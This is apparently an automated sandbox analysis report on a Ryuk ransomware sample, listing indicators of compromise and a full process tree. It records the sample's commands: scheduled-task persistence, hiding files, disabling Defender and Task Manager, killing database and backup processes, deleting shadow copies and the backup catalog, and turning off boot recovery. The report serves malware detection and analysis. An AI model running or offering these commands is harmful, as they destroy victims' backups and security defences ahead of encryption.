1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	1172	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1640	WMIC.exe
Token: SeSecurityPrivilege	1640	WMIC.exe
Token: SeTakeOwnershipPrivilege	1640	WMIC.exe
Token: SeLoadDriverPrivilege	1640	WMIC.exe
Token: SeSystemProfilePrivilege	1640	WMIC.exe
Token: SeSystemtimePrivilege	1640	WMIC.exe
Token: SeProfSingleProcessPrivilege	1640	WMIC.exe
Token: SeIncBasePriorityPrivilege	1640	WMIC.exe
Token: SeCreatePagefilePrivilege	1640	WMIC.exe
Token: SeBackupPrivilege	1640	WMIC.exe
Token: SeRestorePrivilege	1640	WMIC.exe
Token: SeShutdownPrivilege	1640	WMIC.exe
Token: SeDebugPrivilege	1640	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1640	WMIC.exe
Token: SeRemoteShutdownPrivilege	1640	WMIC.exe
Token: SeUndockPrivilege	1640	WMIC.exe
Token: SeManageVolumePrivilege	1640	WMIC.exe
Token: 33	1640	WMIC.exe
Token: 34	1640	WMIC.exe
Token: 35	1640	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1640	WMIC.exe
Token: SeSecurityPrivilege	1640	WMIC.exe
Token: SeTakeOwnershipPrivilege	1640	WMIC.exe
Token: SeLoadDriverPrivilege	1640	WMIC.exe
Token: SeSystemProfilePrivilege	1640	WMIC.exe
Token: SeSystemtimePrivilege	1640	WMIC.exe
Token: SeProfSingleProcessPrivilege	1640	WMIC.exe
Token: SeIncBasePriorityPrivilege	1640	WMIC.exe
Token: SeCreatePagefilePrivilege	1640	WMIC.exe
Token: SeBackupPrivilege	1640	WMIC.exe
Token: SeRestorePrivilege	1640	WMIC.exe
Token: SeShutdownPrivilege	1640	WMIC.exe
Token: SeDebugPrivilege	1640	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1640	WMIC.exe
Token: SeRemoteShutdownPrivilege	1640	WMIC.exe
Token: SeUndockPrivilege	1640	WMIC.exe
Token: SeManageVolumePrivilege	1640	WMIC.exe
Token: 33	1640	WMIC.exe
Token: 34	1640	WMIC.exe
Token: 35	1640	WMIC.exe
Token: SeBackupPrivilege	1756	vssvc.exe
Token: SeRestorePrivilege	1756	vssvc.exe
Token: SeAuditPrivilege	1756	vssvc.exe
Token: SeDebugPrivilege	1348	taskkill.exe
Token: SeDebugPrivilege	812	taskkill.exe
Token: SeDebugPrivilege	1364	taskkill.exe
Token: SeSecurityPrivilege	1584	wevtutil.exe
Token: SeBackupPrivilege	1584	wevtutil.exe
Token: SeSecurityPrivilege	572	wevtutil.exe
Token: SeBackupPrivilege	572	wevtutil.exe
Token: SeSecurityPrivilege	1204	wevtutil.exe
Token: SeBackupPrivilege	1204	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe
Token: SeSecurityPrivilege	1828	wevtutil.exe
Token: SeBackupPrivilege	1828	wevtutil.exe
Token: SeSecurityPrivilege	1708	wevtutil.exe
Token: SeBackupPrivilege	1708	wevtutil.exe
Token: SeSecurityPrivilege	904	wevtutil.exe
Token: SeBackupPrivilege	904	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1192 wrote to memory of 1512	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	28
PID 1192 wrote to memory of 1512	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	28
PID 1192 wrote to memory of 1512	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	28
PID 1512 wrote to memory of 1816	1512	cmd.exe	29
PID 1512 wrote to memory of 1816	1512	cmd.exe	29
PID 1512 wrote to memory of 1816	1512	cmd.exe	29
PID 1192 wrote to memory of 1744	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	30
PID 1192 wrote to memory of 1744	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	30
PID 1192 wrote to memory of 1744	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	30
PID 1192 wrote to memory of 1656	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	31
PID 1192 wrote to memory of 1656	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	31
PID 1192 wrote to memory of 1656	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	31
PID 1192 wrote to memory of 1616	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	32
PID 1192 wrote to memory of 1616	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	32
PID 1192 wrote to memory of 1616	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	32
PID 1616 wrote to memory of 952	1616	cmd.exe	33
PID 1616 wrote to memory of 952	1616	cmd.exe	33
PID 1616 wrote to memory of 952	1616	cmd.exe	33
PID 1192 wrote to memory of 1660	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	34
PID 1192 wrote to memory of 1660	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	34
PID 1192 wrote to memory of 1660	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	34
PID 1660 wrote to memory of 1796	1660	cmd.exe	35
PID 1660 wrote to memory of 1796	1660	cmd.exe	35
PID 1660 wrote to memory of 1796	1660	cmd.exe	35
PID 1192 wrote to memory of 1712	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	36
PID 1192 wrote to memory of 1712	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	36
PID 1192 wrote to memory of 1712	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	36
PID 1712 wrote to memory of 1820	1712	cmd.exe	37
PID 1712 wrote to memory of 1820	1712	cmd.exe	37
PID 1712 wrote to memory of 1820	1712	cmd.exe	37
PID 1192 wrote to memory of 1344	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	38
PID 1192 wrote to memory of 1344	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	38
PID 1192 wrote to memory of 1344	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	38
PID 1344 wrote to memory of 904	1344	cmd.exe	39
PID 1344 wrote to memory of 904	1344	cmd.exe	39
PID 1344 wrote to memory of 904	1344	cmd.exe	39
PID 1192 wrote to memory of 640	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	40
PID 1192 wrote to memory of 640	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	40
PID 1192 wrote to memory of 640	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	40
PID 640 wrote to memory of 1340	640	cmd.exe	41
PID 640 wrote to memory of 1340	640	cmd.exe	41
PID 640 wrote to memory of 1340	640	cmd.exe	41
PID 1192 wrote to memory of 752	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	42
PID 1192 wrote to memory of 752	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	42
PID 1192 wrote to memory of 752	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	42
PID 752 wrote to memory of 1608	752	cmd.exe	43
PID 752 wrote to memory of 1608	752	cmd.exe	43
PID 752 wrote to memory of 1608	752	cmd.exe	43
PID 1192 wrote to memory of 304	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	44
PID 1192 wrote to memory of 304	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	44
PID 1192 wrote to memory of 304	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	44
PID 1192 wrote to memory of 1076	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	45
PID 1192 wrote to memory of 1076	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	45
PID 1192 wrote to memory of 1076	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	45
PID 304 wrote to memory of 1080	304	cmd.exe	46
PID 304 wrote to memory of 1080	304	cmd.exe	46
PID 304 wrote to memory of 1080	304	cmd.exe	46
PID 1192 wrote to memory of 1308	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	48
PID 1192 wrote to memory of 1308	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	48
PID 1192 wrote to memory of 1308	1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	48
PID 1076 wrote to memory of 1528	1076	cmd.exe	49
PID 1076 wrote to memory of 1528	1076	cmd.exe	49
PID 1076 wrote to memory of 1528	1076	cmd.exe	49
PID 1308 wrote to memory of 1420	1308	cmd.exe	50

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1792	attrib.exe
1796	attrib.exe
1340	attrib.exe
1608	attrib.exe
1788	attrib.exe

C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
"C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1512
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:1816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Drops startup file
  PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  PID:1656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1660
- - C:\Windows\system32\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
    3⤵
    - Drops startup file
    - Views/modifies file attributes
    PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1712
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:1820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe" /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1344
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:640
- - C:\Windows\system32\attrib.exe
    attrib +h +s ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:1340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:752
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:304
- - C:\Windows\system32\cmd.exe
    cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    3⤵
    PID:1080
  - - C:\Windows\system32\icacls.exe
      icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      4⤵
      Modifies file permissions
      PID:1480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1076
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:1528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1308
- - C:\Windows\system32\cmd.exe
    cmd.exe /c taskkill /t /f /im sql*
    3⤵
    PID:1420
  - - C:\Windows\system32\taskkill.exe
      taskkill /t /f /im sql*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1172
- - C:\Windows\system32\taskkill.exe
    taskkill /f /t /im veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
  2⤵
  PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
  2⤵
  PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
  2⤵
  PID:1516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
  2⤵
  PID:268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
  2⤵
  PID:1240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:1812
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:1816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:1708
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:1656
- - C:\Windows\system32\reg.exe
    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:1764
- - C:\Windows\system32\reg.exe
    reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:1620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
  2⤵
  PID:1816
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
    3⤵
    PID:1512
  - - C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:1740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
  2⤵
  PID:1572
- - C:\Windows\system32\cmd.exe
    cmd.exe /c vssadmin Delete Shadows /All /Quiet
    3⤵
    PID:952
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
  2⤵
  PID:1656
- - C:\Windows\system32\cmd.exe
    cmd.exe /c wmic shadowcopy delete
    3⤵
    PID:1204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
  2⤵
  PID:940
- - C:\Windows\system32\cmd.exe
    cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
    3⤵
    PID:1872
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} boostatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
  2⤵
  PID:640
- - C:\Windows\system32\cmd.exe
    cmd.exe /c bcdedit /set {default} recoveryenabled no
    3⤵
    PID:1032
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
  2⤵
  PID:1688
- - C:\Windows\system32\cmd.exe
    cmd.exe /c wbadmin delete catalog -quiet/
    3⤵
    PID:2044
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet/
      4⤵
      Deletes backup catalog
      Drops file in Windows directory
      PID:568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop avpsus /y
  2⤵
  PID:2032
- - C:\Windows\system32\net.exe
    net stop avpsus /y
    3⤵
    PID:924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
  2⤵
  PID:1516
- - C:\Windows\system32\net.exe
    net stop McAfeeDLPAgentService /y
    3⤵
    PID:812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:1480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop mfewc /y
  2⤵
  PID:832
- - C:\Windows\system32\net.exe
    net stop mfewc /y
    3⤵
    PID:1880
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
  2⤵
  PID:1708
- - C:\Windows\system32\net.exe
    net stop BMR Boot Service /y
    3⤵
    PID:1620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:856
- - C:\Windows\system32\net.exe
    net stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:1804
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:1584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
  2⤵
  PID:1688
- - C:\Windows\system32\sc.exe
    sc config SQLTELEMETRY start=disabled
    3⤵
    - Launches sc.exe
    PID:728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1868
- - C:\Windows\system32\sc.exe
    sc config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    - Launches sc.exe
    PID:360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
  2⤵
  PID:1072
- - C:\Windows\system32\sc.exe
    sc config SQLWriter start= disabled
    3⤵
    - Launches sc.exe
    PID:432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
  2⤵
  PID:1792
- - C:\Windows\system32\sc.exe
    sc config SstpSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
  2⤵
  PID:1096
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
  2⤵
  PID:1768
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
  2⤵
  PID:1172
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:1176
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  PID:1312
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  PID:856
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  PID:1868
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  PID:1664
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  PID:1144
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  PID:1480
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  PID:916
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  PID:832
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  PID:304
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  PID:1804
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  PID:1312
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1780
- C:\Windows\system32\cmd.exe
